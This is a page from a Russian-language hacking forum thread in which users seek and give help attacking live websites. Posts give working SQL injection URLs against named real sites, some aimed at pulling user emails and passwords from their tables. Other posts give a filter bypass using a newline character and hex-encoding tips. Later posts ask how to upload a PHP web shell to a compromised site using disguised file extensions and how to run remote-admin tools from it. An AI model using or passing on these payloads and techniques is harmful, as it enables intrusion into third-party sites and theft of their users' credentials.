Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ZnikiR

    ZnikiR Member

    Joined:
    14 Jan 2009
    Messages:
    120
    Likes Received:
    21
    Reputations:
    -5
    Никак не могу понять как здесь код sql написть
     
    #15961 ZnikiR, 25 Jan 2011
    Last edited: 25 Jan 2011
  2. xarko_v

    xarko_v Banned

    Joined:
    18 Jan 2011
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    http://www.exploit-db.com/exploits/15827/
     
  3. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    Netcat CMS
    -1+union+select+1,user_id+from+User+--+ показывает
    -1+union+select+1,unhex(hex(password))+from+User+--+ показывает
    -1+union+select+1,password+from+User+--+ показывает

    -1+union+select+1,login+from+User+--+ НЕ показывает
    -1+union+select+1,unhex(hex(login))+from+User+--+ НЕ показывает
    -1+union+select+1,aes_decrypt(aes_encrypt(login))+from+User+--+ НЕ показывает

    Ни Email, Login, ForumName, FullName не хочет показывать как можно это обойти?
     
  4. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,057
    Likes Received:
    615
    Reputations:
    690
    2noviyuser
    пробуй захексить
    login=0x6c6f67696e
     
    _________________________
    1 person likes this.
  5. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    не хочет показывает только login, не подошел
    можент надо конвертировать str в int? есть ли такая функция
     
  6. ivitalii

    ivitalii New Member

    Joined:
    16 Jan 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Code:
    On /index.php?name=1%00%27&file=faq&p=3098
    While executing query "SELECT mid, title, custom_title, active, view, blocks, version FROM cms_modules WHERE LOWER(title)='1�''"
    
    the following error occured: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1' at line 1
    
    In: /home/anonimka/public_html/index.php on line: 73
    Что за ошибка ? можно как-нибудь раскрутить ?
     
  7. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Ошибка синтаксиса MySQL. По всей видимости, можно.
    Как раскрутить, написано здесь http://forum.antichat.ru/thread43966.html
    П.С. Зачем там нуллбайт?
     
  8. xarko_v

    xarko_v Banned

    Joined:
    18 Jan 2011
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    +union+select+1,cast(version()+as+binary),3,4,5,6
    or
    +union+select+1,convert(version()+using+latin1),3,4,5,6
    or
    /*!...*/
     
    1 person likes this.
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    помогите разобратся, невогу вывести информацию из табле схема, постоянно пишет ошибку

    http://nicedave.com/content.php?id=6659+union+select+1,2,3
     
  10. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Доступ к information_schema закрыт.Ручками перебирай таблицы.Там есть таблица "users" :)
     
  11. j-prof

    j-prof Banned

    Joined:
    29 Aug 2010
    Messages:
    321
    Likes Received:
    11
    Reputations:
    -4
    privateurl.com
    в поле логин
    хз как там раскрутить помогите и вообще кривая какаят +--+ не робит а /* робит чо эт знач помогите
    кста через union можно ток select выполнять или апдэйт, delete, insert тож
     
  12. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    393
    Likes Received:
    35
    Reputations:
    1
    Так работает:

    Code:
    http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
    А так нет:
    Code:
    http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
    Почему? =\
     
    #15972 DCrypt, 28 Jan 2011
    Last edited: 28 Jan 2011
  13. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Кажется там from фильтруется.
     
  14. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    393
    Likes Received:
    35
    Reputations:
    1
    http://www.exploit-db.com/exploits/16060/
    Где?
     
  15. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    а при чем тут сама уязвимость, фильтруется на хосте, только не from, а select from, обходится так:
    Code:
    http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT%0a1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
     
    3 people like this.
  16. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
     
  17. KandidaT'S

    KandidaT'S New Member

    Joined:
    9 Jul 2010
    Messages:
    58
    Likes Received:
    3
    Reputations:
    0
    поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
     
  18. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    uname -a: Windows NT WINCTRL-7IBNPUN 6.1 build 7600 ((null)) i586

    Safe-mode: ON (secure)

    C:\ drwxrwxrwx

    (это пхп шелл)

    Можно как-то запускать радмин или что-то?
     
  19. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,105
    Likes Received:
    305
    Reputations:
    86
    Нереал так подсказать.
    В админке есть залив файлов?
    Тулза от Пашкелы вроде умеет.
     
    _________________________
    1 person likes this.
  20. KandidaT'S

    KandidaT'S New Member

    Joined:
    9 Jul 2010
    Messages:
    58
    Likes Received:
    3
    Reputations:
    0
    заливка фаилов есть я так понел картинки и pdf заливаю sheel.php.pdf пишет неправильное название
     
Loading...
Thread Status:
Not open for further replies.